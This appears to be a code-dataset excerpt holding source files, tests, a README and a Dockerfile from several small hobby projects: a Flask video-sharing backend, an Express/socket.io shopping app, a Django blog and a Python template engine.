backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n backend.add_like(user1['id'],post1['id'])\n backend.add_like(user1['id'],post2['id'])\n\n ret = backend.is_like_post(user1['id'],[post1['id'],post2['id']])\n assert ret[post1['id']] == True\n\n\nclass TestActivityLogic(TestCase):\n\n def test_add_activity(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n ac1 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'like'\n }\n ac2 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'comment'\n }\n\n ret = backend.add_activity(ac1)\n assert ret['to_id'] == user2['id']\n ret = backend.add_activity(ac2)\n\n rets = backend.get_activity_by_user(user2['id'])\n assert len(rets) == 2\n\n\nclass TestOtherLogic(TestCase):\n\n def test_new_install(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n device_token = '1234567890'\n install = backend.new_install(user1['id'],device_token)\n assert install['device_token'] == device_token\n\n install = backend.get_install_by_user(user1['id'])\n\n assert 
install['device_token'] == device_token\n\n install = backend.set_install(user1['id'],{'badge':20})\n print install\n assert install['badge'] == 20\n\n def test_add_file_data(self):\n st = backend.add_file_data(10,'1234567890')\n st = backend.add_file_data(10,'123243435454545')\n assert len(st) == 36\n\nclass TestCommentLogic(TestCase):\n\n def test_comment(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n \n comment1 = backend.add_comment(post1['id'],'comment1',user2['id'])\n assert comment1['post_id'] == post1['id']\n\n comment2 = backend.add_comment(post1['id'],'comment2',user2['id'])\n \n comments = backend.get_post_comment(post1['id'])\n\n assert len(comments) == 2\n \n ret = backend.get_post_comment_count(post1['id'])\n assert ret == 2\n\nclass TestTagLogic(TestCase):\n\n def test_tag(self):\n\n tag1 = Tag(name='tag1',show=True,pic_url='pic_url',\n recommended=True)\n tag2 = Tag(name='tag2',show=True,pic_url='pic_url',\n recommended=True)\n db.session.add(tag1)\n db.session.add(tag2)\n db.session.commit()\n\n tags = backend.get_all_tags()\n assert len(tags) == 2\n\n tags = backend.get_recommend_tags()\n assert len(tags) == 2\n\n tag = backend.get_tag(tag1.id)\n\n assert tag['name'] == 'tag1'\n \n user = backend.add_user('username','photo_url','weibo_id')\n post1 = backend.add_post('title1',user['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user['id'],'video_url',\n pic_small='pic_small')\n\n tagging1 = Tagging(taggable_type='post',taggable_id=post1['id'],\n tag_id=tag1.id)\n tagging2 = Tagging(taggable_type='post',taggable_id=post2['id'],\n tag_id=tag1.id)\n \n db.session.add(tagging1)\n db.session.add(tagging2)\n db.session.commit()\n\n posts = backend.get_tag_post(tag1.id)\n assert len(posts) == 2\n\n post_count = backend.get_tag_post_count(tag1.id)\n assert post_count == 2\n \n \nclass TestFeedLogic(TestCase):\n\n def test_get_latest_feed(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03') \n user4 = backend.add_user('username04','photo_url04','weibo_id04')\n\n post1 = backend.add_post('title01',user1['id'],'video_url01',\n pic_small='pic_small01')\n post2 = backend.add_post('title02',user2['id'],'video_url02',\n pic_small='pic_small')\n post3 = backend.add_post('title03',user3['id'],'video_url03',\n pic_small='pic_small03')\n post4 = backend.add_post('title04',user4['id'],'video_url04',\n pic_small='pic_small04')\n\n backend.follow_user(user4['id'],user1['id'])\n backend.follow_user(user4['id'],user2['id'])\n \n\n ret = backend.get_latest_feed(user4['id'],limit=10,offset=0)\n assert len(ret) == 3\n\n backend.set_post(post3['id'],{'recommended':True})\n\n ret = backend.get_latest_feed(user4['id'],limit=10,offset=0)\n assert len(ret) == 4\n\n" }, { "alpha_fraction": 0.6107403635978699, "alphanum_fraction": 0.6199555397033691, "avg_line_length": 29.230770111083984, "blob_id": "d30c4dce8d52192569bcad07d392aea70a0d8377", "content_id": "fbd7752fee2968032b3e0893709a42d06a9491d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3147, "license_type": "no_license", "max_line_length": 90, 
"num_lines": 104, "path": "/motiky/views/activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-10\n\nimport sys \nimport time\nimport logging\nimport traceback\nfrom datetime import datetime\n\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.cacheutil import rcache\nfrom motiky.configs import rq,redis\n\ninstance = Blueprint('activity',__name__)\n\nACTIVITY_UPDATE_TIME_KEY = 'ACTIVITY::UPDATETIME::%(user_id)s'\n\n# atype follow like comment post_reco text\n\ndef filter_activity(ac):\n # todo\n if ac['atype'] in ('follow','like','comment'):\n _user = rcache(3600*24)(backend.get_user)(ac['from_id'])\n ac.update({'user':_user})\n\n if ac['atype'] in ('like','comment','post_reco'):\n _post = rcache(3600*24)(backend.get_post)(ac['post_id'])\n ac.update({'post':_post})\n\n if ac['atype'] in ('comment'):\n _comment = rcache(3600*24)(backend.get_comment)(ac['comment_id'])\n ac.update({'comment':_comment})\n\n return ac\n\nclass UserNewActivityCountView(MethodView):\n\n def get(self,user_id):\n activity_time_meta = redis.hgetall(ACTIVITY_UPDATE_TIME_KEY % \\\n {'user_id':user_id})\n try:\n last_update_time = int(activity_time_meta.get('last_update_time'))\n except:\n last_update_time = int(time.time())\n\n last_update_time = datetime.fromtimestamp(last_update_time)\n count = backend.get_new_activity_count(user_id,last_update_time)\n\n return jsonify(count=count)\n\nclass UserActivityView(MethodView):\n\n def get(self,user_id):\n acs = backend.get_activity_by_user(user_id)\n ac_list = []\n for ac in acs:\n try:\n ac = filter_activity(ac)\n except:\n traceback.print_exc()\n continue\n ac_list.append(ac)\n\n try:\n _user = backend.get_user(user_id)\n except BackendError,ex:\n traceback.print_exc()\n try:\n backend.set_install(user_id,{'badge':0})\n rq.enqueue('motiky.worker.apns_push',\n user_id=user_id,data={\n 'badge':0\n })\n except BackendError,ex:\n traceback.print_exc()\n\n redis.hset(ACTIVITY_UPDATE_TIME_KEY % {'user_id':user_id},\n 'last_update_time',int(time.time()))\n\n return jsonify(results=ac_list)\n\nuser_activity_func = UserActivityView.as_view('user_activity')\nuser_new_activity_count_func = UserNewActivityCountView.as_view('user_new_activity_count')\n\ninstance.add_url_rule('/user/<int:user_id>/activity',\n view_func=user_activity_func,methods=['GET'])\n\ninstance.add_url_rule('/user/<int:user_id>/activity/count',\n view_func=user_new_activity_count_func,methods=['GET'])\n\n\n\n" } ]
43
felixjchen/aisle-go
https://github.com/felixjchen/aisle-go
a1539e41c091ee697c078ccb70c1204dfdb9c053
a54a41b0c19e4b8e5ce3e08072e2876646f5f780
5ddec3ef01c3e9c21b98b4ab681e205b704576f2
refs/heads/master
2023-06-30T19:44:37.463258
2020-10-12T17:41:17
2020-10-12T17:41:17
279,742,521
0
0
null
2020-07-15T02:31:37
2020-10-12T17:41:20
2021-08-05T00:44:48
JavaScript
[ { "alpha_fraction": 0.5565455555915833, "alphanum_fraction": 0.5664839148521423, "avg_line_length": 29.082473754882812, "blob_id": "d73e9ea434085aee45bdd1c432afd4c4b2feb47d", "content_id": "88d40121f6b95712ae4bea0ea3e1b7f99a4c0927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2918, "license_type": "no_license", "max_line_length": 82, "num_lines": 97, "path": "/src/recommendation/recommendItems.py", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "import json\n\n\ndef jsonLoad(filePath='../db/history.json'):\n with open('db/history.json', 'r') as f:\n data = json.load(f)\n return data\n\n\ndef getShoppingList(data, user):\n for usr in data[\"users\"]:\n if usr == user:\n dataList = data[\"users\"][usr][\"shoppinglist\"]\n shoppingList = []\n for item in dataList:\n if not dataList[item][\"purchase_by\"]:\n shoppingList.append(dataList[item][\"name\"])\n return shoppingList\n return None\n\n\ndef getPruchaseHistory(data, pruchaser, pruchasedFor):\n purchases, allPurchases = [], []\n for usr in data[\"users\"]:\n datalist = data[\"users\"][usr][\"shoppinglist\"]\n for item in datalist:\n if usr == pruchasedFor and datalist[item][\"purchase_by\"] == pruchaser:\n purchases.append(datalist[item][\"name\"])\n if datalist[item][\"purchase_by\"] == pruchaser:\n allPurchases.append(datalist[item][\"name\"])\n return purchases, allPurchases\n\n\ndef getPurchasesFor(purchaser, asker):\n data = jsonLoad()\n itemlib, purchases, allPurchases = {}, {}, {}\n countA, countB, countC = 0, 0, 0\n shoppingList = getShoppingList(data, asker)\n purchaseHistory = getPruchaseHistory(data, purchaser, asker)\n\n for item in shoppingList:\n if item not in itemlib:\n itemlib[item] = 1\n countA = countA + 1\n else:\n itemlib[item] = itemlib[item] + 1\n countA = countA + 1\n\n for item in purchaseHistory[0]:\n if item not in purchases:\n purchases[item] = 1\n countB = countB + 1\n else:\n purchases[item] = purchases[item] + 1\n countB = countB + 1\n\n for item in purchaseHistory[1]:\n if item not in allPurchases:\n allPurchases[item] = 1\n countC = countC + 1\n else:\n allPurchases[item] = allPurchases[item] + 1\n countC = countC + 1\n\n if countA == 0:\n countA = 1\n if countB == 0:\n countB = 1\n if countC == 0:\n countC = 1\n\n probItem = {}\n for item in purchases:\n if item not in probItem:\n probItem[item] = 0.6 * purchases[item] / countB\n\n for item in allPurchases:\n if item not in probItem:\n probItem[item] = 0.4 * allPurchases[item] / countC\n else:\n probItem[item] = probItem[item] + \\\n (0.4 * allPurchases[item] / countC)\n\n assignProb = {}\n for item in itemlib:\n if item in probItem:\n assignProb[item] = probItem[item]\n\n return probItem, assignProb\n\n\nif __name__ == \"__main__\":\n purchaser = \"[email protected]\"\n asker = \"[email protected]\"\n probItem, assignProb = getPurchasesFor(purchaser, asker)\n print(\"All the items purchased by {}: {}\".format(purchaser, probItem))\n print(\"Prob for the items on {} list: {}\".format(asker, assignProb))\n" }, { "alpha_fraction": 0.7363057136535645, "alphanum_fraction": 0.7464967966079712, "avg_line_length": 23.53125, "blob_id": "fef4f471608f0de186e7bb72e2a90a0a2ea25ee7", "content_id": "4fdb61864eef53fdb91808ad09b4936e7e74908b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 791, "license_type": "no_license", "max_line_length": 120, "num_lines": 32, "path": "/README.md", "repo_name": "felixjchen/aisle-go", 
"src_encoding": "UTF-8", "text": "# Aisle Go\n\n## Summary\nAisle Go - as in “I’ll go shopping for you” - is a web app designed to bring safety and accessibility to the population.\n- https://redsweater.netlify.app/\nCreated for IBM Summer 2020 Intern hackathon\n\n## Technology\n- IBM Cloud CouchDB\n- IBM Carbon Components\n- Express.js, socket.io, bcrypt\n- Netlify\n- Docker Hub container, continous building with GitHub integration\n- Azure backend, continous delivery by webhook\n \n## Future\n - Integrate exisiting recommendation system, leverage newer AI techniques\n - Blockchain\n - Authorization\n \n## Credentials user:pass\n- [email protected]:a\n- [email protected]:b\n- [email protected]:c\n- [email protected]:d\n- [email protected]:e\n \nBackend\n- https://redsweater.azurewebsites.net/\n\nDockerhub\n- https://hub.docker.com/repository/docker/felixchen1998/redsweater/builds\n" }, { "alpha_fraction": 0.702479362487793, "alphanum_fraction": 0.7272727489471436, "avg_line_length": 11.199999809265137, "blob_id": "5d6c33f19d921965461e5e18ad4d644e7ffb50fa", "content_id": "f839f3b078e451883c493ad3f506eeb2646dd1f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 121, "license_type": "no_license", "max_line_length": 19, "num_lines": 10, "path": "/src/backend/Dockerfile", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "FROM node:14.2\n\nCOPY package.json .\nRUN npm install\n\nCOPY secrets.json .\nCOPY couchdb.js .\nCOPY app.js .\n\nCMD node app.js" }, { "alpha_fraction": 0.6356046795845032, "alphanum_fraction": 0.6367328763008118, "avg_line_length": 24.1875, "blob_id": "8c54895d033f5089bee2fc779e6e7904b615e52b", "content_id": "c6cc7e5a0d903ac522d61caa1e07961ea7505edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4432, "license_type": "no_license", "max_line_length": 89, "num_lines": 176, "path": "/src/backend/app.js", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "const app = require('express')();\nconst http = require('http').Server(app);\nconst io = require('socket.io')(http);\nconst port = process.env.PORT || 80;\nconst {\n v4: uuidv4\n} = require(\"uuid\");\nconst {\n addUser,\n getUser,\n auth,\n addFriend,\n addShoppingItem,\n getFriends,\n getFriendsProfiles,\n addForFriend,\n updatePurchase,\n} = require(\"./couchdb\")\n\nvar socketToEmail = {}\nvar emailToSocket = {}\nvar emailToFriends = {}\n\napp.get('/', function (req, res) {\n res.send('redsweater backend');\n});\n\n\nio.on(\"connect\", (socket) => {\n // either with send()\n socket.send(\"Hello from websocket backend!\");\n\n socket.on(\"loginAttempt\", async (email, password, callback) => {\n let r = await auth(email, password)\n\n // Fail\n if (!r.status) {\n callback(r)\n }\n\n emailToSocket[email] = socket.id\n socketToEmail[socket.id] = email\n emailToFriends[email] = user.friends\n callback(r)\n })\n\n socket.on(\"addItemAttempt\", async (email, item, callback) => {\n\n let itemID = uuidv4()\n item['in_list'] = \"\"\n item['purchase_by'] = \"\"\n\n // Tell all my friends new item\n let friendSockets = getFriendSockets(socket.id)\n let myEmail = socketToEmail[socket.id]\n friendSockets.forEach(friendSocket => {\n // Update feed\n let msg = `${email} has added ${item.name} to their cart`\n io.to(friendSocket).emit('updateFeed', msg);\n\n // Add item to friends list\n io.to(friendSocket).emit('friendNewItem', myEmail, itemID, item);\n })\n\n let r = {\n 
status: await addShoppingItem(email, itemID, item),\n      itemID\n    }\n\n    callback(r)\n  })\n\n  socket.on(\"addFriendAttempt\", async (email, friendEmail, callback) => {\n\n    let r = {\n      status: await addFriend(email, friendEmail),\n      user: await getUser(email),\n      friends: await getFriendsProfiles(email)\n    }\n\n    // Only if add friend is successful\n    if (r.status) {\n      emailToFriends[email].push(friendEmail)\n      // the friend may not have logged in this session yet\n      if (emailToFriends[friendEmail]) {\n        emailToFriends[friendEmail].push(email)\n      }\n\n      // Tell all my friends feeds\n      let friendSockets = getFriendSockets(socket.id)\n      friendSockets.forEach(friendSocket => {\n        let msg = `${email} and ${friendEmail} are now friends`\n        io.to(friendSocket).emit('updateFeed', msg);\n      })\n\n      // new friend rerender\n      let friendSocket = emailToSocket[friendEmail]\n      let f = {\n        user: await getUser(friendEmail),\n        friends: await getFriendsProfiles(friendEmail)\n      }\n      io.to(friendSocket).emit('render', f);\n\n      // I render\n      callback(r)\n    }\n  })\n\n\n  socket.on(\"claimForFriendAttempt\", async (email, friendEmail, itemID, callback) => {\n\n    let r = {\n      item: await addForFriend(email, friendEmail, itemID),\n      user: await getUser(email),\n      friends: await getFriendsProfiles(email)\n    }\n\n    // Tell all my friends, that email claimed friendEmail's item\n    let friendSockets = getFriendSockets(socket.id)\n    friendSockets.forEach(friendSocket => {\n      let msg = `${email} is going to get ${r.item.name} for ${friendEmail}`\n      io.to(friendSocket).emit('updateFeed', msg);\n\n      io.to(friendSocket).emit('friendClaimed', email, itemID)\n    })\n\n    callback(r)\n  })\n\n\n  socket.on(\"purchaseForFriendAttempt\", async (email, friendEmail, itemID, callback) => {\n    let r = {\n      item: await updatePurchase(friendEmail, itemID, email)\n    }\n\n    if (r.item != false) {\n\n      // tell friend rerender\n      let friendSocket = emailToSocket[friendEmail]\n      let f = {\n        user: await getUser(friendEmail),\n        friends: await getFriendsProfiles(friendEmail)\n      }\n      io.to(friendSocket).emit('render', f);\n\n      // Tell all my friends feeds\n      let friendSockets = getFriendSockets(socket.id)\n      friendSockets.forEach(friendSocket => {\n        let msg = `${email} has purchased ${r.item.name} for ${friendEmail}`\n        io.to(friendSocket).emit('updateFeed', msg);\n      })\n\n      callback(r)\n    }\n\n  })\n});\n\nconst getFriendSockets = (mySocketID) => {\n  let myEmail = socketToEmail[mySocketID]\n  let friendEmails = emailToFriends[myEmail]\n  let friendSockets = []\n\n  friendEmails.forEach(friendEmail => {\n    if (friendEmail in emailToSocket) {\n      friendSockets.push(emailToSocket[friendEmail])\n    }\n  });\n\n  return friendSockets\n}\n\n\nhttp.listen(port, function () {\n  console.log('listening on *:' + port);\n});\n\n// https://github.com/socketio/chat-example" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.8602150678634644, "avg_line_length": 46, "blob_id": "a54f8a2d4f12bc93c263792700885020aac9cd", "content_id": "c1a9a971da30c32c9a39427e5a074c21f5c02454", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 93, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/src/backend/buildAndPush.sh", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "docker build -t felixchen1998/redsweater:latest .\ndocker push felixchen1998/redsweater:latest" } ]
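The scoring in `src/recommendation/recommendItems.py` above mixes two frequency estimates: items the purchaser bought specifically for the asker (weight 0.6) and the purchaser's overall purchase history (weight 0.4). A compact Python sketch of that rule; the function and parameter names here are illustrative, not from the repo:

```
from collections import Counter

def score_items(direct_history, overall_history, direct_weight=0.6):
    """Blend per-friend and overall purchase frequencies into one score per item."""
    direct = Counter(direct_history)
    overall = Counter(overall_history)
    # Guard against empty histories, mirroring the countA/countB/countC checks.
    n_direct = max(sum(direct.values()), 1)
    n_overall = max(sum(overall.values()), 1)
    return {
        item: (direct_weight * direct[item] / n_direct
               + (1 - direct_weight) * overall[item] / n_overall)
        for item in set(direct) | set(overall)
    }

# Example: "milk" scores highest because it dominates both histories.
scores = score_items(['milk', 'eggs'], ['milk', 'milk', 'bread'])
```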
5
arbaazkhan07/Django-MiniBlog
https://github.com/arbaazkhan07/Django-MiniBlog
2b390b91e9cc6d38f5b6a5865c11083c88e379cf
a8139376ab443961528e9d18bb0954a2e36efb11
f50ce5efa231602c3425d497244464843c077bf0
refs/heads/master
2023-06-20T15:02:12.100842
2021-07-14T11:34:47
2021-07-14T11:34:47
385,917,570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5821325778961182, "alphanum_fraction": 0.5821325778961182, "avg_line_length": 31.3389835357666, "blob_id": "62a3bda00d2a8ed25d740d64864118af46c2c8c5", "content_id": "d401cba5038b6e74baf39440dce2965bc2f5d0a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3817, "license_type": "no_license", "max_line_length": 106, "num_lines": 118, "path": "/app/views.py", "repo_name": "arbaazkhan07/Django-MiniBlog", "src_encoding": "UTF-8", "text": "from django.shortcuts import redirect, render\nfrom .forms import UserRegisterForm, UserLoginForm, PostForm\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.contrib.auth.models import Group\n\n# Home \ndef home(request):\n posts = Post.show_posts()\n return render(request, 'app/home.html',{ 'posts': posts})\n\n# About \ndef about(request):\n return render(request, 'app/about.html')\n\n# Contact \ndef contact(request):\n return render(request, 'app/contact.html')\n\n# Dashboard\ndef dashboard(request):\n if request.user.is_authenticated:\n posts = Post.show_posts()\n user = request.user\n full_name = user.get_full_name()\n groups = user.groups.all()\n return render(request, 'app/dashboard.html', {\n 'posts': posts ,\n 'full_name': full_name,\n 'groups': groups\n })\n else:\n return redirect('login')\n\n# Add Post\ndef addPost(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Posts added successfully.')\n return redirect('dashboard')\n else:\n form = PostForm()\n return render(request,'app/addPost.html', { 'form': form })\n\n else:\n return redirect('login')\n\n# Delete Post\ndef deletePost(request, id):\n if request.user.is_authenticated:\n if request.method == 'POST':\n post = Post.get_post(id)\n post.delete()\n return redirect('dashboard')\n else:\n return redirect('login')\n\n#Edit Post\ndef editPost(request, id):\n if request.user.is_authenticated:\n post = Post.get_post(id)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n form.save()\n messages.success(request, 'Post updated successfully.')\n return redirect('dashboard')\n else:\n form = PostForm(instance=post)\n return render(request, 'app/editPost.html', { 'form': form })\n else:\n return redirect('login')\n\n# Register \ndef userRegister(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n user = form.save()\n group = Group.objects.get(name='Author')\n user.groups.add(group)\n messages.success(request, 'Congractulations! You have become an Author. 
Now please Login')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, 'app/register.html', { 'form': form })\n else:\n return redirect('dashboard')\n\n# Login \ndef userLogin(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n form = UserLoginForm(request=request, data=request.POST)\n if form.is_valid():\n uname = form.cleaned_data.get('username')\n upass = form.cleaned_data.get('password')\n user = authenticate(username=uname, password=upass)\n print(user)\n if user is not None:\n login(request, user)\n messages.success(request, 'Logged in Successfully!!')\n return redirect('dashboard')\n else:\n form = UserLoginForm()\n return render(request, 'app/login.html', { 'form': form })\n else:\n return redirect('dashboard')\n\n# Logout \ndef userLogout(request):\n logout(request)\n return redirect('home')\n\n" }, { "alpha_fraction": 0.6411150097846985, "alphanum_fraction": 0.6515679359436035, "avg_line_length": 21, "blob_id": "76818e5262dd7fdc3b74a3ed2d295a187feecf28", "content_id": "3e04dff5e0162d5a6fcd1db30a47d72884495a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "no_license", "max_line_length": 44, "num_lines": 13, "path": "/app/models.py", "repo_name": "arbaazkhan07/Django-MiniBlog", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass Post(models.Model):\n title = models.CharField(max_length=100)\n desc = models.TextField()\n\n @staticmethod\n def show_posts():\n return Post.objects.all()\n\n @staticmethod\n def get_post(id):\n return Post.objects.get(pk=id)\n\n" } ]
2
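The views in the record above redirect by URL name ('home', 'login', 'dashboard', and so on), so the app needs a matching URLconf. The sketch below is a plausible app/urls.py, not the repository's actual file: the view functions and the names used by redirect() come straight from views.py, but the path strings and the unreferenced names are assumptions.

# Hypothetical app/urls.py wiring up the views above; the path strings
# are assumptions, while names like 'dashboard' and 'login' match the
# redirect() calls in views.py.
from django.urls import path
from . import views

urlpatterns = [
    path('', views.home, name='home'),
    path('about/', views.about, name='about'),
    path('contact/', views.contact, name='contact'),
    path('dashboard/', views.dashboard, name='dashboard'),
    path('post/add/', views.addPost, name='addpost'),
    path('post/<int:id>/edit/', views.editPost, name='editpost'),
    path('post/<int:id>/delete/', views.deletePost, name='deletepost'),
    path('register/', views.userRegister, name='register'),
    path('login/', views.userLogin, name='login'),
    path('logout/', views.userLogout, name='logout'),
]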
timmartin/stencil
https://github.com/timmartin/stencil
89889159865736184fddab977919609cb93ce19f
81e6c2939cafae1009a9866590e9dd23295d4a9f
12aedff0827d3e881dfd052d25aadc2038a8c68b
refs/heads/master
2021-01-11T14:55:44.703602
2017-07-04T19:43:16
2017-07-04T19:43:50
80,252,832
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6021126508712769, "alphanum_fraction": 0.6021126508712769, "avg_line_length": 27.399999618530273, "blob_id": "e2e9392ff4e558255ea03a0db2f9e8a6fc37f9f1", "content_id": "aca78220e2830dbc776f07b16bc8f44876fbda2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 852, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/tests/compiler_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import unittest\nimport unittest.mock\nimport io\nfrom collections import namedtuple\n\nfrom margate.compiler import Compiler\n\n\nclass CompilerTest(unittest.TestCase):\n\n def test_extend_template(self):\n template_locator = unittest.mock.MagicMock()\n template_locator.find_template.return_value = '/wherever/foo.html'\n\n mock_file = io.StringIO(\"Title: {% block title %}{% endblock %}\")\n\n mock_open = unittest.mock.MagicMock(return_value=mock_file)\n\n with unittest.mock.patch('builtins.open', mock_open):\n compiler = Compiler(template_locator)\n\n function = compiler.compile(\n '{% extends \"base.html\" %}'\n '{% block title %}'\n 'The title'\n '{% endblock %}')\n\n self.assertEquals(\n function(),\n \"Title: The title\")\n" }, { "alpha_fraction": 0.6692422032356262, "alphanum_fraction": 0.6692422032356262, "avg_line_length": 31.669902801513672, "blob_id": "ed3c924212f2a2c65ba1757c9041fd0b859092a9", "content_id": "33972b70b6c372c99a5e7deff68b3e9661620f65", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 78, "num_lines": 103, "path": "/margate/block_parser.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The block parser splits a template into the blocks that make it\nup. There are three different sorts of data in a template that get\nhandled in different ways:\n\n* Literal text, which just gets embedded in the output (but may be\n skipped or repeated by executing code around it).\n* Executable code\n* Embedded variable expressions that get expanded into text output.\n\nIt's implemented as a state machine, where the template starts out in\nliteral text and transitions to a different state depending on whether\nit encounters ``{{``, ``}}``, ``{%`` or ``%}``.\n\n\"\"\"\n\nfrom . import code_generation\n\n\nclass LiteralState:\n \"\"\"The literal state is the state the block parser is in when it is\n processing anything that will be included in the template output\n as a literal. 
The template starts out in literal state and\n transitions back into it every time a block is closed.\n \"\"\"\n\n def __init__(self, text):\n self.text = text\n\n def __eq__(self, other):\n if not isinstance(other, LiteralState):\n return False\n\n return self.text == other.text\n\n def __repr__(self):\n return \"<LiteralState %r>\" % self.text\n\n def accept_open_expression(self, offset, length):\n return (ExpressionState(self.text[offset + length:]),\n code_generation.Literal(self.text[:offset]))\n\n def accept_open_execution(self, offset, length):\n return (ExecutionState(self.text[offset + length:]),\n code_generation.Literal(self.text[:offset]))\n\n def accept_close_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_end_input(self):\n return (None, code_generation.Literal(self.text))\n\n\nclass ExecutionState:\n \"\"\"Execution state is the state when any kind of code execution is\n occurring. This includes the start and ends of blocks.\n \"\"\"\n\n def __init__(self, text):\n self.text = text\n\n def accept_open_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_open_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n return (LiteralState(self.text[offset + length:]),\n code_generation.Execution(self.text[:offset].strip()))\n\n def accept_end_input(self):\n raise Exception(\"Syntax error\")\n\n\nclass ExpressionState:\n \"\"\"Expression state occurs when processing a ``{{ ... }}`` expression\n that embeds the value of an expression into the output.\n\n \"\"\"\n def __init__(self, text):\n self.text = text\n\n def accept_open_expression(self, offset, length):\n raise Exception(\"Syntax error: opened expression inside expression\")\n\n def accept_open_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_expression(self, offset, length):\n return (LiteralState(self.text[offset + length:]),\n code_generation.VariableExpansion(self.text[:offset].strip()))\n\n def accept_end_input(self):\n raise Exception(\"Syntax error\")\n" }, { "alpha_fraction": 0.6892988681793213, "alphanum_fraction": 0.6892988681793213, "avg_line_length": 16.828947067260742, "blob_id": "c6d5814e0e811f4857b181048d60473e95c1745a", "content_id": "551f8928599359a240e605b8198e116d802c4d5c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1355, "license_type": "permissive", "max_line_length": 68, "num_lines": 76, "path": "/docs/reference.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "Reference\n=========\n\nThe process of building a template into a function has the following\nsteps:\n\n* The template is broken down into blocks (such as literal text and\n code execution) that are treated differently. This is handled by\n :py:mod:`the block parser <margate.block_parser>`.\n* The resultant sequence of blocks is passed to the\n :py:class:`~margate.parser.Parser` to be turned into a parse tree.\n* The parse tree is processed by :py:mod:`code generation\n <margate.code_generation>` to make Python bytecode.\n\nCompiler\n--------\n\n.. automodule:: margate.compiler\n\n.. 
